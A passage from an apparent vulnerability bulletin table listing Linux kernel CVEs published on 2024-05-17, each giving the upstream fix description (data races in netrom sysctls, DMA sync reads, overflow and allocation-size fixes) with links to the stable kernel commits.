</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fixed overflow check in mi_enum_attr()</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27407" target="_blank">CVE-2024-27407</a><br><a href="https://git.kernel.org/stable/c/1c0a95d99b1b2b5d842e5abc7ef7eed1193b60d7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/652cfeb43d6b9aba5c7c4902bed7a7340df131fb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8c77398c72618101d66480b94b34fe9087ee3d08" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: dmaengine: dw-edma: eDMA: Add sync read before starting the DMA transfer in remote setup The Linked list element and pointer are not stored in the same memory as the eDMA controller register. If the doorbell register is toggled before the full write of the linked list a race condition error will occur. In remote setup we can only use a readl to the memory to assure the full write has occurred.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27408" target="_blank">CVE-2024-27408</a><br><a href="https://git.kernel.org/stable/c/bbcc1c83f343e580c3aa1f2a8593343bf7b55bba" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d24fe6d5a1cfdddb7a9ef56736ec501c4d0a5fd3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f396b4df27cfe01a99f4b41f584c49e56477be3a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: dmaengine: dw-edma: HDMA: Add sync read before starting the DMA transfer in remote setup The Linked list element and pointer are not stored in the same memory as the HDMA controller register. If the doorbell register is toggled before the full write of the linked list a race condition error will occur. In remote setup we can only use a readl to the memory to assure the full write has occurred.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27409" target="_blank">CVE-2024-27409</a><br><a href="https://git.kernel.org/stable/c/17be6f5cb223f22e4733ed8fe8b2247cbb677716" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/227ef58a9b0c372efba422e8886a8015a1509eba" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/712a92a48158e02155b4b6b21e03a817f78c9b7e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: wifi: nl80211: reject iftype change with mesh ID change It's currently possible to change the mesh ID when the interface isn't yet in mesh mode, at the same time as changing it into mesh mode. This leads to an overwrite of data in the wdev-&gt;u union for the interface type it currently has, causing cfg80211_change_iface() to do wrong things when switching. We could probably allow setting an interface to mesh while setting the mesh ID at the same time by doing a different order of operations here, but realistically there's no userspace that's going to do this, so just disallow changes in iftype when setting mesh ID.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27410" target="_blank">CVE-2024-27410</a><br><a href="https://git.kernel.org/stable/c/063715c33b4c37587aeca2c83cf08ead0c542995" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/0cfbb26ee5e7b3d6483a73883f9f6157bca22ec9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/177d574be4b58f832354ab1ef5a297aa0c9aa2df" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/930e826962d9f01dcd2220176134427358d112f2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/99eb2159680af8786104dac80528acd5acd45980" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a2add961a5ed25cfd6a74f9ffb9e7ab6d6ded838" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d38d31bbbb9dc0d4d71a45431eafba03d0bc150d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f78c1375339a291cba492a70eaf12ec501d28a8e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/nouveau: keep DMA buffers required for suspend/resume Nouveau deallocates a few buffers post GPU init which are required for GPU suspend/resume to function correctly. This is likely not as big an issue on systems where the NVGPU is the only GPU, but on multi-GPU set ups it leads to a regression where the kernel module errors and results in a system-wide rendering freeze. This commit addresses that regression by moving the two buffers required for suspend and resume to be deallocated at driver unload instead of post init.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27411" target="_blank">CVE-2024-27411</a><br><a href="https://git.kernel.org/stable/c/be00e15b240ed71fc30c0576af7ab670c8271661" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f6ecfdad359a01c7fd8a3bcfde3ef0acdf107e6e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: power: supply: bq27xxx-i2c: Do not free non existing IRQ The bq27xxx i2c-client may not have an IRQ, in which case client-&gt;irq will be 0. bq27xxx_battery_i2c_probe() already has an if (client-&gt;irq) check wrapping the request_threaded_irq(). But bq27xxx_battery_i2c_remove() unconditionally calls free_irq(client-&gt;irq) leading to: [ 190.310742] ------------[ cut here ]------------ [ 190.310843] Trying to free already-free IRQ 0 [ 190.310861] WARNING: CPU: 2 PID: 1304 at kernel/irq/manage.c:1893 free_irq+0x1b8/0x310 Followed by a backtrace when unbinding the driver. Add an if (client-&gt;irq) to bq27xxx_battery_i2c_remove() mirroring probe() to fix this.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27412" target="_blank">CVE-2024-27412</a><br><a href="https://git.kernel.org/stable/c/083686474e7c97b0f8b66df37fcb64e432e8b771" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2df70149e73e79783bcbc7db4fa51ecef0e2022c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7394abc8926adee6a817bab10797e0adc898af77" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cefe18e9ec84f8fe3e198ccebb815cc996eb9797" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d4d813c0a14d6bf52d810a55db06a2e7e3d98eaa" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d7acc4a569f5f4513120c85ea2b9f04909b7490f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e601ae81910ce6a3797876e190a2d8ef6cf828bc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fbca8bae1ba79d443a58781b45e92a73a24ac8f8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: efi/capsule-loader: fix incorrect allocation size gcc-14 notices that the allocation with sizeof(void) on 32-bit architectures is not enough for a 64-bit phys_addr_t: drivers/firmware/efi/capsule-loader.c: In function 'efi_capsule_open': drivers/firmware/efi/capsule-loader.c:295:24: error: allocation of insufficient size '4' for type 'phys_addr_t' {aka 'long long unsigned int'} with size '8' [-Werror=alloc-size] 295 | cap_info-&gt;phys = kzalloc(sizeof(void *), GFP_KERNEL); | ^ Use the correct type instead here.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27413" target="_blank">CVE-2024-27413</a><br><a href="https://git.kernel.org/stable/c/00cf21ac526011a29fc708f8912da446fac19f7b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/11aabd7487857b8e7d768fefb092f66dfde68492" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4b73473c050a612fb4317831371073eda07c3050" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/537e3f49dbe88881a6f0752beaa596942d9efd64" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/62a5dcd9bd3097e9813de62fa6f22815e84a0172" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/950d4d74d311a18baed6878dbfba8180d7e5dddd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ddc547dd05a46720866c32022300f7376c40119f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: rtnetlink: fix error logic of IFLA_BRIDGE_FLAGS writing back In the commit d73ef2d69c0d ("rtnetlink: let rtnl_bridge_setlink checks IFLA_BRIDGE_MODE length"), an adjustment was made to the old loop logic in the function `rtnl_bridge_setlink` to enable the loop to also check the length of the IFLA_BRIDGE_MODE attribute. However, this adjustment removed the `break` statement and led to an error logic of the flags writing back at the end of this function. if (have_flags) memcpy(nla_data(attr), &amp;flags, sizeof(flags)); // attr should point to IFLA_BRIDGE_FLAGS NLA !!! Before the mentioned commit, the `attr` is granted to be IFLA_BRIDGE_FLAGS. However, this is not necessarily true fow now as the updated loop will let the attr point to the last NLA, even an invalid NLA which could cause overflow writes. This patch introduces a new variable `br_flag` to save the NLA pointer that points to IFLA_BRIDGE_FLAGS and uses it to resolve the mentioned error logic.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27414" target="_blank">CVE-2024-27414</a><br><a href="https://git.kernel.org/stable/c/167d8642daa6a44b51de17f8ff0f584e1e762db7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/743ad091fb46e622f1b690385bb15e3cd3daf874" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/831bc2728fb48a8957a824cba8c264b30dca1425" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/882a51a10ecf24ce135d573afa0872aef02c5125" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a1227b27fcccc99dc44f912b479e01a17e2d7d31" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b9fbc44159dfc3e9a7073032752d9e03f5194a6f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f2261eb994aa5757c1da046b78e3229a3ece0ad9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netfilter: bridge: confirm multicast packets before passing them up the stack conntrack nf_confirm logic cannot handle cloned skbs referencing the same nf_conn entry, which will happen for multicast (broadcast) frames on bridges. Example: macvlan0 | br0 / \ ethX ethY ethX (or Y) receives a L2 multicast or broadcast packet containing an IP packet, flow is not yet in conntrack table. 1. skb passes through bridge and fake-ip (br_netfilter)Prerouting. -&gt; skb-&gt;_nfct now references a unconfirmed entry 2. skb is broad/mcast packet. bridge now passes clones out on each bridge interface. 3. skb gets passed up the stack. 4. In macvlan case, macvlan driver retains clone(s) of the mcast skb and schedules a work queue to send them out on the lower devices. The clone skb-&gt;_nfct is not a copy, it is the same entry as the original skb. The macvlan rx handler then returns RX_HANDLER_PASS. 5. Normal conntrack hooks (in NF_INET_LOCAL_IN) confirm the orig skb. The Macvlan broadcast worker and normal confirm path will race. This race will not happen if step 2 already confirmed a clone. In that case later steps perform skb_clone() with skb-&gt;_nfct already confirmed (in hash table). This works fine. But such confirmation won't happen when eb/ip/nftables rules dropped the packets before they reached the nf_confirm step in postrouting. Pablo points out that nf_conntrack_bridge doesn't allow use of stateful nat, so we can safely discard the nf_conn entry and let inet call conntrack again. This doesn't work for bridge netfilter: skb could have a nat transformation. Also bridge nf prevents re-invocation of inet prerouting via 'sabotage_in' hook. Work around this problem by explicit confirmation of the entry at LOCAL_IN time, before upper layer has a chance to clone the unconfirmed entry. The downside is that this disables NAT and conntrack helpers. Alternative fix would be to add locking to all code parts that deal with unconfirmed packets, but even if that could be done in a sane way this opens up other problems, for example: -m physdev --physdev-out eth0 -j SNAT --snat-to 1.2.3.4 -m physdev --physdev-out eth1 -j SNAT --snat-to 1.2.3.5 For multicast case, only one of such conflicting mappings will be created, conntrack only handles 1:1 NAT mappings. Users should set create a setup that explicitly marks such traffic NOTRACK (conntrack bypass) to avoid this, but we cannot auto-bypass them, ruleset might have accept rules for untracked traffic already, so user-visible behaviour would change.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27415" target="_blank">CVE-2024-27415</a><br><a href="https://git.kernel.org/stable/c/2b1414d5e94e477edff1d2c79030f1d742625ea0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/62e7151ae3eb465e0ab52a20c941ff33bb6332e9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7c3f28599652acf431a2211168de4a583f30b6d5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/80cd0487f630b5382734997c3e5e3003a77db315" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cb734975b0ffa688ff6cc0eed463865bf07b6c01" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: Fix handling of HCI_EV_IO_CAPA_REQUEST If we received HCI_EV_IO_CAPA_REQUEST while HCI_OP_READ_REMOTE_EXT_FEATURES is yet to be responded assume the remote does support SSP since otherwise this event shouldn't be generated.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27416" target="_blank">CVE-2024-27416</a><br><a href="https://git.kernel.org/stable/c/30a5e812f78e3d1cced90e1ed750bf027599205f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/79820a7e1e057120c49be07cbe10643d0706b259" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7e74aa53a68bf60f6019bd5d9a9a1406ec4d4865" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8e2758cc25891d2b76717aaf89b40ed215de188c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/afec8f772296dd8e5a2a6f83bbf99db1b9ca877f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c3df637266df29edee85e94cab5fd7041e5753ba" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/df193568d61234c81de7ed4d540c01975de60277" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fba268ac36ab19f9763ff90d276cde0ce6cd5f31" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ipv6: fix potential "struct net" leak in inet6_rtm_getaddr() It seems that if userspace provides a correct IFA_TARGET_NETNSID value but no IFA_ADDRESS and IFA_LOCAL attributes, inet6_rtm_getaddr() returns -EINVAL with an elevated "struct net" refcount.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27417" target="_blank">CVE-2024-27417</a><br><a href="https://git.kernel.org/stable/c/10bfd453da64a057bcfd1a49fb6b271c48653cdb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1b0998fdd85776775d975d0024bca227597e836a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/33a1b6bfef6def2068c8703403759024ce17053e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/44112bc5c74e64f28f5a9127dc34066c7a09bd0f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/810fa7d5e5202fcfb22720304b755f1bdfd4c174" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8a54834c03c30e549c33d5da0975f3e1454ec906" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: mctp: take ownership of skb in mctp_local_output Currently, mctp_local_output only takes ownership of skb on success, and we may leak an skb if mctp_local_output fails in specific states; the skb ownership isn't transferred until the actual output routing occurs. Instead, make mctp_local_output free the skb on all error paths up to the route action, so it always consumes the passed skb.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27418" target="_blank">CVE-2024-27418</a><br><a href="https://git.kernel.org/stable/c/3773d65ae5154ed7df404b050fd7387a36ab5ef3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a3c8fa54e904b0ddb52a08cc2d8ac239054f61fd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a639441c880ac479495e5ab37e3c29f21ae5771b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cbebc55ceacef1fc0651e80e0103cc184552fc68" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix data-races around sysctl_net_busy_read We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27419" target="_blank">CVE-2024-27419</a><br><a href="https://git.kernel.org/stable/c/0866afaff19d8460308b022345ed116a12b1d0e1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/16d71319e29d5825ab53f263b59fdd8dc2d60ad4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/34cab94f7473e7b09f5205d4583fb5096cb63b5b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/43464808669ba9d23996f0b6d875450191687caf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bbf950a6e96a91cf8cf0c71117b94ed3fafc9dd3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d380ce70058a4ccddc3e5f5c2063165dc07672c6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d623fd5298d95b65d27ef5a618ebf39541074856" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f9055fa2b2931261d5f89948ee5bc315b6a22d4a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_link_fails_count We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27420" target="_blank">CVE-2024-27420</a><br><a href="https://git.kernel.org/stable/c/07bbccd1adb56b39eef982b8960d59e3c005c6a1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/0b8eb369c182814d817b9449bc9e86bfae4310f9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/97a4d8b9f67cc7efe9a0c137e12f6d9e40795bf1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bc76645ebdd01be9b9994dac39685a3d0f6f7985" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c558e54f7712b086fbcb611723272a0a4b0d451c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cfe0f73fb38a01bce86fe15ef5f750f850f7d3fe" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cfedde3058bf976f2f292c0a236edd43afcdab57" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/db364859ce68fb3a52d42cd87a54da3dc42dc1c8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_routing_control We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27421" target="_blank">CVE-2024-27421</a><br><a href="https://git.kernel.org/stable/c/4c02b9ccbb11862ee39850b2b285664cd579b039" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/859175d4bc11af829e2fdd261a7effdaba9b5d8f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b5dffcb8f71bdd02a4e5799985b51b12f4eeaf76" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b7d33e083f9d5d39445c0a91e7ad4f3e2c47fcb5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c13fbb5902bce848759385986d4833f5b90782c1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c4309e5f8e80584715c814e1d012dbc3eee5a500" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d732b83251322ecd3b503e03442247745d6052ce" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f9c4d42464173b826190fae2283ed1a4bbae0c8b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_transport_no_activity_timeout We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27422" target="_blank">CVE-2024-27422</a><br><a href="https://git.kernel.org/stable/c/01d4e3afe257768cd2a45f15a0e57bacf932b140" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2309b369fae2d9cdc3c945cd3eaec84eb1958ca3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/498f1d6da11ed6d736d655a2db14ee2d9569eecb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4eacb242e22e31385a50a393681d0fe4b55ed1e9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6f254abae02abd4a0aca062c1b3812d7e2d8ea94" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/73426c32e259c767d40613b956d5b80d0c28a9a9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cbba77abb4a553c1f5afac1ba2a0861aa1f13549" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f99b494b40431f0ca416859f2345746199398e2b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_transport_requested_window_size We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27423" target="_blank">CVE-2024-27423</a><br><a href="https://git.kernel.org/stable/c/0d43a58900e5a2bfcc9de47e16c6c501c0bef853" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/46803b776d869b0c36041828a83c4f7da2dfa03b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/489e05c614dbeb1a1148959f02bdb788891819e6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4f2efa17c3ec5e4be0567b47439b9713c0dc6550" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/652b0b35819610a42b8a90d21acb12f69943b397" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/89aa78a34340e9dbc3248095f44d81d0e1c23193" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a2e706841488f474c06e9b33f71afc947fb3bf56" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/db006d7edbf0b4800390ece3727a82f4ae764043" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix a data-race around sysctl_netrom_transport_busy_delay We need to protect the reader reading the sysctl value because the value can be changed concurrently.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
